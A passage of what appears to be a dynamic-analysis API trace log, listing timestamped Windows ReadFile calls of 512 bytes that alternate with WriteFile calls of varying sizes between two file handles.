lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.757] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.757] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.758] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.758] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.759] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x296, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.759] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.760] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.760] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.761] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.761] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.762] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.762] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.763] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.763] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.764] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ec, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.764] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.765] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.765] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.766] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.766] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.767] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x296, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.767] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.768] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ad, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.769] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.769] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ce, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.769] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.770] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.770] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.771] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x39e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.771] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.772] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x382, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.772] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.773] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.774] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.774] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.775] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x34b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.775] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.775] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3db, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.776] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.776] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3c6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.777] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.777] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x383, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.778] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.778] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.779] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.779] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x299, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.780] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.780] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2aa, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.781] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.781] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ef, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.782] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.782] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.783] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.783] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x295, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.784] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.784] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.785] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.785] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.786] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.788] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.788] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.789] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x272, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.789] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.790] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2df, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.790] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.790] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.791] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.792] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.792] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.793] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.793] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.794] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.794] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.795] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2eb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.795] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.795] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.796] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.796] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.797] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.798] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.798] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.799] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.799] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.800] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x23b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.800] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.800] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.801] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.801] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ba, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.802] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.803] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.803] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.804] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.804] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.805] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x301, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.805] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.806] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.806] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.807] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.807] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, 